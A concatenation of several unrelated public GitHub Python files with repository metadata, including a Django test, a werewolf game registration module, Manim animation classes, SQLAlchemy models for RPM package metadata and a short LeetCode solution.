api_help_center.create, methods=["POST"])
app.add_url_rule("/api/centros/mas_turnos", "api_help_center_more_turns",
api_help_center.more_turns)
| UTF-8 | Python | false | false | 1,603 | py | 103 | help_center.py | 68 | 0.59451 | 0.59451 | 0 | 31 | 50.677419 | 96 |
mohan277/project_management_portal | 1,176,821,044,852 | 7bfb324966728ff8395e9282093b11b580279dcd | 0a9c7079723ef6776324fa5a37fe0ce2868fd54f | /project_management_portal_auth/tests/storages/test_validate_admin_storage_implementation.py | 0512217edd5aef26f1e7a385b9502ad240a53e04 | [] | no_license | https://github.com/mohan277/project_management_portal | 9e6b4ab4cce09bb61a742de212332f69663781eb | ce91c912731c7bba7674c1a00385862bad7a437b | refs/heads/master | "2023-06-20T15:06:56.251028" | "2021-07-22T17:03:00" | "2021-07-22T17:03:00" | 269,610,965 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pytest
from project_management_portal_auth.dtos.user_dto import IsAdminDTO
from project_management_portal_auth.models.user import User
from project_management_portal_auth.storages.storage_implementation import \
StorageImplementation
class TestStorageImplementation:
@pytest.mark.django_db
def test_given_user_id_is_admin_return_is_admin_valid_dto(
self, is_admin_valid_dto):
# Arrange
expected_dto = is_admin_valid_dto
user_id = 1
storage = StorageImplementation()
# Act
actual_dto = storage.is_admin(user_id=user_id)
#Assert
assert actual_dto == expected_dto
@pytest.fixture
def create_user(self):
user_obj = User.objects.create(
name='user1',
is_admin=False,
profile_pic_url='profile_pic_1'
)
return user_obj
@pytest.fixture
def is_admin_valid_dto(self, create_user):
is_admin_valid_dto = IsAdminDTO(is_admin=False)
return is_admin_valid_dto
| UTF-8 | Python | false | false | 1,040 | py | 138 | test_validate_admin_storage_implementation.py | 136 | 0.648077 | 0.645192 | 0 | 37 | 27.108108 | 76 |
Aasthaengg/IBMdataset | 6,949,257,121,209 | 83368e6900fafac3e96caf248d0c4467419dcd36 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02399/s930109842.py | d2033ff35be53912e7581771eb41afb34effb7a7 | [] | no_license | https://github.com/Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | "2023-04-22T10:22:44.763102" | "2021-05-13T17:27:22" | "2021-05-13T17:27:22" | 367,112,348 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding=utf-8
a, b = map(int, raw_input().split())
print "{0:d} {1:d} {2:f}".format(a / b, a % b, 1.0 * a / b) | UTF-8 | Python | false | false | 112 | py | 202,060 | s930109842.py | 202,055 | 0.5 | 0.446429 | 0 | 4 | 27.25 | 59 |
Kaetherina/werwolf | 6,579,889,919,878 | 676b1980983d842c5d21c663eb087d4b7ea77d63 | ce6db73b1e301bf14946886b1c08623ab660211c | /registrationLogic.py | 1a205b814ef13b3f67022acdadcf3715a05f11bc | [] | no_license | https://github.com/Kaetherina/werwolf | 608861949de682af89261952a583d4a45bd2843f | d61a1b66574dd3a311f2b4ef89e0cb96d77a7d12 | refs/heads/master | "2020-06-13T01:01:07.746706" | "2016-12-07T16:01:17" | "2016-12-07T16:01:17" | 75,471,257 | 1 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
import time
import random
import logging
master = "not set"
allowedRoles = ["Amor", "Seherin", "Hexe", "Jaeger"]
players = []
roles = []
playersRoles = []
specialRoles = []
numPlayers = 0
pw = "werwolf"
def setMaster(name):
global players
global master
master = name
players.append(name)
print("the master is set to \""+name+"\"")
def setPassword(password):
global pw
pw = password
print("the password was set to \"" + password +"\"")
def getPassword():
return pw
def setNumOfPlayers(numOfPlayers):
global numPlayers
numPlayers = numOfPlayers
print("The number of players is "+ numPlayers)
def setSpecialRoles(wantedSpecialRoles):
global roles
if testSpecialRoles(wantedSpecialRoles):
global specialRoles
specialRoles= wantedSpecialRoles
roles = getAllRoles(numPlayers, wantedSpecialRoles)
print("These are all the possible roles: "+ str(roles))
return roles
else:
print("not all special roles were found.. do some spellcheck")
return False
def testSpecialRoles(specialRoles):
temp = -1
for i in range(0, len(specialRoles)):
if allowedRoles.index(specialRoles[i])<0:
return False
return True
def getAllRoles(num, specialRoles):
global roles
if num<8:
numWerwolf = 1
elif num<13:
numWerwolf = 2
elif num<16:
numWerwolf = 3
else:
numWerwolf = int(num/4)
numSpecials = len(specialRoles)
numBuerger = num - numWerwolf - numSpecials
for i in range(0, num):
if i<numWerwolf:
roles.append("Werwolf")
elif (i-numWerwolf)<numBuerger:
roles.append("Buerger")
else:
roles.append(specialRoles[i-numWerwolf-numBuerger])
return roles
def ready():
if master == "not set":
return "master"
elif numPlayers <5:
return "players"
elif len(specialRoles) == 0:
return "roles"
else:
return "ready"
def newPlayer(name, inputPassword):
if inputPassword==pw:
if name in players:
return "!name"
players.append(name)
print("we currently have these players: "+ str(players))
print("the length of the array is currently "+ str(len(players)) + "while the number of players is " + str(numPlayers))
if numPlayers==len(players):
giveRoles()
print("got all players now! Proceed to the game")
return "success"
return "player added"
else:
return "!password"
def giveRoles():
global playersRoles
global roles
random.shuffle(roles)
print(str(playersRoles))
for i in range(0, len(roles)):
playersRoles.append([players[i], roles[i]])
print("go all players and roles now, have a look: " + str(playersRoles))
def reset(name):
if name==master:
players = []
playersRoles = []
return True
else:
return False
#playerRoles=[[Kaethe, Werwolf], [Kevin, Schlampe], []]
| UTF-8 | Python | false | false | 2,821 | py | 5 | registrationLogic.py | 4 | 0.672102 | 0.665721 | 0 | 119 | 21.705882 | 121 |
headboost/manim | 12,687,333,425,901 | cea5a12f7ea6992c90ced7a9e27c464678533adc | fb2786fb05995df29e2b36dd00ffeffee6ad69ce | /derivative/objects.py | b2667e78a54fd049c039c614c25f0ab7081311f3 | [] | no_license | https://github.com/headboost/manim | 2a1cbeb7526ed9c40add309c5b78336398560469 | c07fc81ec9d36e94b4d80cb00f7f6c3505de2210 | refs/heads/main | "2023-03-29T11:26:57.518165" | "2021-04-01T00:21:03" | "2021-04-01T00:21:03" | 349,242,711 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from manim import *
import numpy as np
import math
class DerivativeSquaresArea(VGroup):
CONFIG={
"original_square_kwargs":{
"width":2.5,
"height":2.5,
"color":BLUE_E,
"fill_color":BLUE_E,
"fill_opacity":1,
},
"dx_square_right_kwargs":{
"width":0.2,
"height":2.5,
"color":YELLOW_E,
"fill_color":YELLOW_E,
"fill_opacity":1,
},
"dx_square_up_kwargs":{
"width":2.5,
"height":0.2,
"color":YELLOW_E,
"fill_color":YELLOW_E,
"fill_opacity":1,
},
"dxdx_square_kwargs":{
"width":0.2,
"height":0.2,
"color":YELLOW_E,
"fill_color":YELLOW_E,
"fill_opacity":1,
},
"brace_and_label_kwargs_for_original_square":{
"brace_color":WHITE,
"label_color":BLUE,
},
"brace_and_label_kwargs_for_dx_squares":{
"brace_color":WHITE,
"label_color":YELLOW,
},
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
super().__init__(**kwargs)
self.original_square=Rectangle(**self.original_square_kwargs)
self.dx_square_right=Rectangle(**self.dx_square_right_kwargs).next_to(self.original_square,RIGHT,buff=0)
self.dx_square_up=Rectangle(**self.dx_square_up_kwargs).next_to(self.original_square,UP,buff=0)
self.dxdx_square=Rectangle(**self.dxdx_square_kwargs).next_to(self.dx_square_right,UP,buff=0)
self.squares=VGroup(self.original_square, self.dx_square_right, self.dx_square_up, self.dxdx_square)
self.brace_up=Brace(self.dx_square_up,0.4*UP,)
self.label_up=MathTex("x").scale(1).set_color(self.brace_and_label_kwargs_for_original_square["label_color"]).next_to(self.brace_up, 0.6*UP)
self.brace_right=Brace(self.dx_square_right, 0.4*RIGHT,)
self.label_right=MathTex("x").scale(1).set_color(self.brace_and_label_kwargs_for_original_square["label_color"]).next_to(self.brace_right, 0.6*RIGHT)
self.braces_and_labels=VGroup(self.brace_up, self.label_up, self.brace_right, self.label_right)
self.dx_brace_up=Brace(self.dxdx_square,0.4*UP,)
self.dx_label_up=MathTex("dx").scale(0.9).set_color(self.brace_and_label_kwargs_for_dx_squares["label_color"]).next_to(self.dx_brace_up, 0.6*UP)
self.dx_brace_right=Brace(self.dxdx_square,0.4*RIGHT, )
self.dx_label_right=MathTex("dx").scale(0.9).set_color(self.brace_and_label_kwargs_for_dx_squares["label_color"]).next_to(self.dx_brace_right, 0.6*RIGHT)
self.dx_braces_and_labels=VGroup(self.dx_brace_up, self.dx_label_up, self.dx_brace_right, self.dx_label_right)
self.all_squares=VGroup(self.squares, self.braces_and_labels, self.dx_braces_and_labels).move_to([0,0,0])
self.add(
self.all_squares,
)
def get_original_square(self):
return self.original_square
def get_dx_square_right(self):
return self.dx_square_right
def get_dx_square_up(self):
return self.dx_square_up
def get_dxdx_square(self):
return self.dxdx_square
def get_brace_up(self):
return self.brace_up
def get_brace_right(self):
return self.brace_right
def get_dx_brace_up(self):
return self.dx_brace_up
def get_dx_brace_right(self):
return self.dx_brace_right
def get_label_up(self):
return self.label_up
def get_label_right(self):
return self.label_right
def get_dx_label_up(self):
return self.dx_label_up
def get_dx_label_right(self):
return self.dx_label_right
class DerivativeSquaresAreaSplitted(DerivativeSquaresArea):
CONFIG={
"kwargs":
{
"split_factor": 0.2
},
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
super().__init__(**kwargs)
self.dx_square_right.shift(self.kwargs["split_factor"]*RIGHT)
self.dx_square_up.shift(self.kwargs["split_factor"]*UP)
self.dxdx_square.shift(self.kwargs["split_factor"]*UP+self.kwargs["split_factor"]*RIGHT)
self.brace_up.shift(self.kwargs["split_factor"]*UP)
self.brace_right.shift(self.kwargs["split_factor"]*RIGHT)
self.label_up.shift(self.kwargs["split_factor"]*UP)
self.label_right.shift(self.kwargs["split_factor"]*RIGHT)
self.dx_brace_up.shift(self.kwargs["split_factor"]*UP+self.kwargs["split_factor"]*RIGHT)
self.dx_brace_right.shift(self.kwargs["split_factor"]*UP+self.kwargs["split_factor"]*RIGHT)
self.dx_label_up.shift(self.kwargs["split_factor"]*UP+self.kwargs["split_factor"]*RIGHT)
self.dx_label_right.shift(self.kwargs["split_factor"]*UP+self.kwargs["split_factor"]*RIGHT)
class DerivativeCubeVolume(VGroup):
CONFIG={
"original_cube_kwargs":{
"color":BLUE_E,
"stroke_color":WHITE,
"opacity":0.75,
"stroke_width":0.5,
"side_length": 2.5,
},
"added_cubes_kwargs":{
"color":YELLOW_E,
"stroke_color":YELLOW,
"opacity":0.4,
"stroke_width":0.5,
"thickness": 0.2,
},
"brace_and_label_kwargs_for_original_cube":{
"brace_color":WHITE,
"label_color":BLUE,
},
"brace_and_label_kwargs_for_dx_cube":{
"brace_color":WHITE,
"label_color":YELLOW,
},
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
super().__init__(**kwargs)
c_opacity_cubes=0.4
# transform_matrix
y=10*PI/180
x=10*PI/180
y_mat=[[math.cos(y),0,math.sin(y)],[0,1,0],[-math.sin(y),0,math.cos(y)]] #y軸周りに回転
x_mat=[[1,0,0],[0,math.cos(x),-math.sin(x)],[0,math.sin(x),math.cos(x)]] #x軸周りに回転
# fix coordinates
fix_c=self.original_cube_kwargs["side_length"]/2+self.added_cubes_kwargs["thickness"]/2
self.cube=Cube(
fill_opacity=self.original_cube_kwargs["opacity"],
fill_color=self.original_cube_kwargs["color"],
color=self.original_cube_kwargs["stroke_color"],
stroke_width=self.original_cube_kwargs["stroke_width"],
side_length=self.original_cube_kwargs["side_length"]
).move_to([0,0,0])
self.cube_f=Prism(
dimensions=[self.original_cube_kwargs["side_length"],self.original_cube_kwargs["side_length"],self.added_cubes_kwargs["thickness"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[0,0,fix_c]
)
self.cube_t=Prism(
dimensions=[self.original_cube_kwargs["side_length"],self.added_cubes_kwargs["thickness"],self.original_cube_kwargs["side_length"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
). move_to(
[0, fix_c, 0]
)
self.cube_r=Prism(
dimensions=[self.added_cubes_kwargs["thickness"],self.original_cube_kwargs["side_length"],self.original_cube_kwargs["side_length"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[fix_c,0,0]
)
self.bar_f=Prism(
dimensions=[self.original_cube_kwargs["side_length"],self.added_cubes_kwargs["thickness"],self.added_cubes_kwargs["thickness"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[0,
fix_c,
fix_c]
)
self.bar_r=Prism(
dimensions=[self.added_cubes_kwargs["thickness"],self.original_cube_kwargs["side_length"],self.added_cubes_kwargs["thickness"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[fix_c,
0,
fix_c]
)
self.bar_t=Prism(
dimensions=[self.added_cubes_kwargs["thickness"],self.added_cubes_kwargs["thickness"],self.original_cube_kwargs["side_length"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[
fix_c,
fix_c,
0,]
)
self.cube_dx=Prism(
dimensions=[self.added_cubes_kwargs["thickness"],self.added_cubes_kwargs["thickness"],self.added_cubes_kwargs["thickness"]],
fill_opacity=self.added_cubes_kwargs["opacity"],
fill_color=self.added_cubes_kwargs["color"],
color=self.added_cubes_kwargs["stroke_color"],
stroke_width=self.added_cubes_kwargs["stroke_width"],
).move_to(
[
fix_c,
fix_c,
fix_c,]
)
self.cubes=VGroup(
self.cube,
self.cube_f,
self.cube_t,
self.cube_r,
self.bar_f,
self.bar_t,
self.bar_r,
self.cube_dx
)
self.br_cube=Brace(
self.cube,LEFT
).move_to(
[-(fix_c+0.2), 0, -(fix_c+0.2)]
)
self.lab_cube=MathTex("x").scale(1).set_color(
self.brace_and_label_kwargs_for_original_cube["label_color"]
).next_to(self.br_cube,1*LEFT)
self.br_cube_t=Brace(
self.bar_f,LEFT
).move_to(
[-(fix_c+0.2), (fix_c), -(fix_c+0.2)]
)
self.lab_cube_t=MathTex("dx").scale(0.9).set_color(self.brace_and_label_kwargs_for_dx_cube["label_color"]).next_to(self.br_cube_t,1*LEFT)
self.braces_and_labels=VGroup(self.br_cube, self.lab_cube, self.br_cube_t, self.lab_cube_t)
self.cubes_and_braces=VGroup(self.cubes, self.braces_and_labels).apply_matrix(y_mat).apply_matrix(x_mat)
self.add(self.cubes_and_braces)
def get_original_cube(self):
return self.cube
def get_original_brace_and_label(self):
return VGroup(self.br_cube, self.lab_cube)
def get_d_brace_and_label(self):
return VGroup(self.br_cube_t, self.lab_cube_t)
def get_dx_cubes(self):
return VGroup(self.cube_f, self.cube_t, self.cube_r)
def get_dxdx_cubes(self):
return VGroup(self.bar_f, self.bar_t, self.bar_r)
def get_dx3_cube(self):
return self.cube_dx
class DerivativeCubeVolumeSplitted(DerivativeCubeVolume): | UTF-8 | Python | false | false | 11,665 | py | 6 | objects.py | 4 | 0.571944 | 0.562151 | 0 | 304 | 37.296053 | 161 |
cncota/python-projects-6-to-10 | 506,806,149,457 | e8f4012b14288d3757fc62ca64431065d4ea878d | aa91395c989e3c387143f815ef9c9aaa9bce46af | /program5/model.py | 2afed283cbb6e8c9da3bf3cf09b10144efdad369 | [] | no_license | https://github.com/cncota/python-projects-6-to-10 | be0e016192fbaf283de48778c00e414d19966a93 | c50b98d33d6e859697630876c06535192d838d18 | refs/heads/master | "2020-05-29T19:26:07.963255" | "2019-05-30T02:38:22" | "2019-05-30T02:38:22" | 189,330,155 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import controller, sys
import model #strange, but we need a reference to this module to pass this module to update
from ball import Ball
from floater import Floater
from blackhole import Black_Hole
from pulsator import Pulsator
from hunter import Hunter
import math,random
running = False
cycle_count = 0
balls = set()
object = None
simu = set()
def world():
return (controller.the_canvas.winfo_width(),controller.the_canvas.winfo_height())
def random_angle():
# between 0 and 2pi
return random.random()*math.pi*2
def reset ():
global running,cycle_count,balls
running = False
cycle_count = 0
balls = set()
def start():
global running
running = True
def stop():
global running
running = False
def step ():
global cycle_count
global running
if running == True:
for i in [1]:
cycle_count += 1
for b in balls:
b.update()
running = False
break
elif running == False:
for i in [1]:
cycle_count += 1
for b in balls:
b.update()
break
#remember the kind of object to add to the simulation when an (x,y) coordinate in the canvas
# is clicked next (or remember to remove an object by such a click)
def select_object(kind):
global object
object = str(kind)
def mouse_click(x,y):
global object
if object == 'Ball':
balls.add( Ball(x,y,random_angle()))
elif object == "Floater":
balls.add(Floater(x,y,random_angle()))
elif object == "Black_Hole":
simu.add(Black_Hole(x,y))
elif object == "Pulsator":
simu.add(Pulsator(x,y))
elif object == "Remove":
g = balls
h = set()
k = set()
for f in g:
if f.contains((x,y)):
h.add(f)
for s in simu:
if s.contains((x,y)):
k.add(s)
for l in h:
remove(l)
for b in k:
simu.remove(b)
pass
elif object == "Hunter":
simu.add(Hunter(x,y, random_angle()))
#add simulton s to the simulation
def add(s):
balls.add(s)
# remove simulton s from the simulation
def remove(s):
balls.remove(s)
#find/return a set of simultons that each satisfy predicate p
def find(p):
g = balls
h = set()
for i in g:
if p.contains((i._x,i._y)):
h.add(i)
for l in h:
remove(l)
display_all()
#call update for every simulton in the simulation
def update_all():
global cycle_count
if running:
cycle_count += 1
for b in balls:
b.update()
for s in simu:
find(s)
s.update()
#delete from the canvas every simulton in the simulation, and then call display for every
# simulton in the simulation to add it back to the canvas possibly in a new location: to
# animate it; also, update the progress label defined in the controller
def display_all():
# Easier to delete all and display all; could use move with more thought
for o in controller.the_canvas.find_all():
controller.the_canvas.delete(o)
for b in balls:
b.display(controller.the_canvas)
for s in simu:
s.display(controller.the_canvas)
controller.the_progress.config(text=str(len(balls))+" balls/"+str(cycle_count)+" cycles")
| UTF-8 | Python | false | false | 3,617 | py | 16 | model.py | 16 | 0.556262 | 0.553497 | 0 | 148 | 22.439189 | 93 |
chong601/rpm-package-explorer | 2,499,670,986,423 | c977b469ba88651afa3da4f90bbdc03bba1c32a9 | b1e30c4fde506d67dbe8a6ea02d5bee200118474 | /rpm_package_explorer/db_model/sqlalchemy_models.py | 108bade55e3a27dc1f8083568f8fc35bc18a9297 | [
"MIT"
] | permissive | https://github.com/chong601/rpm-package-explorer | a60486b26e7d2ccb7dda2187907ae8b7959e757c | 5a14f15f90612528b323d0bb4cdeb2005925b02b | refs/heads/main | "2023-06-24T16:39:26.125234" | "2021-07-26T13:12:48" | "2021-07-26T13:12:48" | 384,791,697 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import uuid
from dataclasses import dataclass
from sqlalchemy import Text, Integer, Boolean, Column, TIMESTAMP
@dataclass
class DBInfo(object):
__tablename__ = 'db_info'
dbinfo_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
repo_category: str = Column(Text, comment='Repository category that this row represents')
dbversion: int = Column(Integer, comment='DB version')
checksum: str = Column(Text, comment='Hash for the XML file')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class Packages(object):
"""Represents the `packages` table"""
__tablename__ = 'packages'
pkg_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
pkgKey: int = Column(Integer, comment='Primary key for the packages')
# Also used as a package hash
pkgId: str = Column(Text, nullable=False, comment='The package ID of the package')
name: str = Column(Text, nullable=False, comment='Package name')
arch: str = Column(Text, nullable=False, comment='Architecture the package is for')
version: str = Column(Text, nullable=False, comment='Package version')
epoch: int = Column(Integer, nullable=False, comment='Package epoch')
release: str = Column(Text, nullable=False, comment='Package release')
summary: str = Column(Text, nullable=False, comment='Package summary')
description: str = Column(Text, nullable=False, comment='Package description')
url: str = Column(Text, comment='Package upstream URL')
time_file: int = Column(TIMESTAMP, comment='File timestamp')
time_build: int = Column(TIMESTAMP, comment='File build time')
rpm_license: str = Column(Text, comment='Package license')
rpm_vendor: str = Column(Text)
rpm_group: str = Column(Text)
rpm_buildhost: str = Column(Text)
rpm_sourcerpm: str = Column(Text, comment='Source RPM file location')
rpm_header_start: int = Column(Integer)
rpm_header_end: int = Column(Integer)
rpm_packager: str = Column(Text)
size_package: int = Column(Integer)
size_installed: int = Column(Integer)
size_archive: int = Column(Integer)
location_href: str = Column(Text)
location_base: str = Column(Text)
checksum_type: str = Column(Text)
def __init__(self, **kwargs):
"""Initialize package object based on the passed in keyword arguments
:param **kwargs: Keyword arguments containing package data to be inserted into the database
"""
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class Conflicts(object):
__tablename__ = 'conflicts'
conflict_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
pkgId: str = Column(Text, nullable=False)
name: str = Column(Text, comment='Package name')
flags: str = Column(Text, comment='Package conflict comparison flag')
epoch: int = Column(Integer, comment='Package epoch that the package conflicts with')
version = Column(Text, comment='Package version that the package conflicts with')
release = Column(Text, comment='Package release that the package conflicts with')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class Enhances(object):
__tablename__ = 'enhances'
enhance_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
pkgId: str = Column(Text, nullable=False)
name: str = Column(Text, comment='Package name')
flags: str = Column(Text, comment='Package conflict comparison flag')
epoch: int = Column(Integer, comment='Package epoch that the package enhances')
version: str = Column(Text, comment='Package version that the package enhances')
release: str = Column(Text, comment='Package release that the package enhances')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class Files(object):
"""Class that represents the files table
Note: This table will follow the saner approach of listing each file in its own row
rather than the original format that uses / as the separator for the file name and
per-character separator for file type in the original SQLite packages database
"""
__tablename__ = 'files'
file_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
pkgId: str = Column(Text, nullable=False)
name: str = Column(Text, comment='File name')
type: str = Column(Text, comment='File type')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class Obsoletes(object):
__tablename__ = 'obsoletes'
enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
pkgId: str = Column(Text, nullable=False)
name: str = Column(Text, comment='Package name')
flags: str = Column(Text, comment='Package conflict comparison flag')
epoch: int = Column(Integer, comment='Package epoch that the package enhances')
version: str = Column(Text, comment='Package version that the package enhances')
release: str = Column(Text, comment='Package release that the package enhances')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class Provides(object):
__tablename__ = 'provides'
enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
pkgId: str = Column(Text, nullable=False)
name: str = Column(Text, comment='Package name')
flags: str = Column(Text, comment='Package conflict comparison flag')
epoch: int = Column(Integer, comment='Package epoch that the package enhances')
version: str = Column(Text, comment='Package version that the package enhances')
release: str = Column(Text, comment='Package release that the package enhances')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class Recommends(object):
__tablename__ = 'Recommends'
enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
pkgId: str = Column(Text, nullable=False)
name: str = Column(Text, comment='Package name')
flags: str = Column(Text, comment='Package conflict comparison flag')
epoch: int = Column(Integer, comment='Package epoch that the package enhances')
version: str = Column(Text, comment='Package version that the package enhances')
release: str = Column(Text, comment='Package release that the package enhances')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class Requires(object):
__tablename__ = 'requires'
enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
pkgId: str = Column(Text, nullable=False)
name: str = Column(Text, comment='Package name')
flags: str = Column(Text, comment='Package conflict comparison flag')
epoch: int = Column(Integer, comment='Package epoch that the package enhances')
version: str = Column(Text, comment='Package version that the package enhances')
release: str = Column(Text, comment='Package release that the package enhances')
pre: bool = Column(Boolean, comment='Signals if the requirement is a prerequisite for preinstallation')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class Suggests(object):
__tablename__ = 'Suggests'
enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
pkgId: str = Column(Text, nullable=False)
name: str = Column(Text, comment='Package name')
flags: str = Column(Text, comment='Package conflict comparison flag')
epoch: int = Column(Integer, comment='Package epoch that the package enhances')
version: str = Column(Text, comment='Package version that the package enhances')
release: str = Column(Text, comment='Package release that the package enhances')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class Supplements(object):
__tablename__ = 'supplements'
enhance_uuid = Column(Text, primary_key=True, default=uuid.uuid4)
pkgId: str = Column(Text, nullable=False)
name: str = Column(Text, comment='Package name')
flags: str = Column(Text, comment='Package conflict comparison flag')
epoch: int = Column(Integer, comment='Package epoch that the package enhances')
version: str = Column(Text, comment='Package version that the package enhances')
release: str = Column(Text, comment='Package release that the package enhances')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class FileList(object):
__tablename__ = 'filelist'
filelist_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
pkgId: str = Column(Text, nullable=False)
filename: str = Column(Text, comment='File name')
filetype: str = Column(Text, comment='File type')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
@dataclass
class ChangeLog(object):
__tablename__ = 'changelog'
changelog_uuid: str = Column(Text, primary_key=True, default=uuid.uuid4)
pkgId: str = Column(Text, nullable=False)
author: str = Column(Text, comment='Author name')
date: int = Column(TIMESTAMP, comment='Changelog date')
changelog: str = Column(Text, comment='Changes')
def __init__(self, **kwargs):
# FUUUUUUUUUUUCK
for k, v in kwargs.items():
setattr(self, k, v)
| UTF-8 | Python | false | false | 9,958 | py | 12 | sqlalchemy_models.py | 9 | 0.670918 | 0.669612 | 0 | 259 | 37.447876 | 107 |
mgutierrezz/Practice_Problems | 11,347,303,629,543 | b24c2757dbaaff63fe53ee403b53d20ed2a7174a | 6a85de9ee4e251e3c7cd920892e57ca500bc80af | /Number_Complement.py | d62835527d9f8fb683d790bb46b99468e9850586 | [] | no_license | https://github.com/mgutierrezz/Practice_Problems | dd3dbde182636cafbd984e09f75dcfcee76398b9 | e71e0e2e28d444564f4221b209c4cf68d72f6ea3 | refs/heads/master | "2021-08-31T14:31:34.293462" | "2017-12-21T17:50:29" | "2017-12-21T17:50:29" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Number Compliment from @LeetCode.com
------------------------------------
Given a positive integer, output its unsigned complement number.
The complement strategy is to flip the bits of its binary representation.
** The given integer fits within a 32-bit signed integer range.
** No leading 0's
"""
class Solution:
def findComplement(self, num):
"""
:type num: int
:rtype: int
"""
binary_num = bin(num)[2:] # Convert the int to binary & remove first 2 characters
output = int('1' * len(binary_num)) - int(binary_num) # Negate bin. number with (1-bits * size of bin. number)
return int(str(output), 2) # Convert the str of bin. num into an int & return it
# Test Cases:
#
# Int --> newInt | Binary --> newBinary
# ----------------------------
# 17 --> 14 | 10001 --> 01110
# 4 --> 3 | 100 --> 011
test = Solution()
print(test.findComplement(17))
print(test.findComplement(4))
| UTF-8 | Python | false | false | 1,015 | py | 4 | Number_Complement.py | 3 | 0.557635 | 0.525123 | 0 | 33 | 29.757576 | 119 |
SaltieRL/Saltie | 335,007,479,728 | 8703681331d6d3c8bd2b6567f9cb99a628d34230 | a165b266e96c44bb27c6886ce88d88ba381aa20e | /examples/replays/pass_length.py | cb9d6df7e9c48ea9e7909908d42014d69ff1eedc | [
"MIT"
] | permissive | https://github.com/SaltieRL/Saltie | ab616f261f480ebb8d10c32c0a37e046e8188d6f | a491ecfa5c77583ec370a0a378d27865dbd8da63 | refs/heads/master | "2021-06-25T06:35:02.232354" | "2019-01-26T16:50:43" | "2019-01-26T16:50:43" | 111,743,860 | 148 | 32 | MIT | false | "2019-01-26T16:50:44" | "2017-11-22T23:58:21" | "2019-01-26T02:25:01" | "2019-01-26T16:50:43" | 83,377 | 75 | 23 | 22 | Python | false | null | from examples.autoencoder.autoencoder_model import AutoencoderModel
from examples.autoencoder.autoencoder_model_holder import AutoencoderModelHolder
from examples.autoencoder.autoencoder_output_formatter import AutoencoderOutputFormatter
from examples.legacy.legacy_input_formatter import LegacyInputFormatter
from examples.legacy.legacy_normalizer_input_formatter import LegacyNormalizerInputFormatter
from framework.output_formatter.host_output_formatter import HostOutputFormatter
from trainer.parsed_download_trainer import ParsedDownloadTrainer
import matplotlib.pyplot as plt
class PassLengthTrainer(ParsedDownloadTrainer):
hit_lengths = []
def process_file(self, input_file):
print('Loading file ', input_file)
steer = input_file.players[0].data.loc[1:100]['steer']
if (steer > 0 & steer < 100).sum() > 0:
print ('controller')
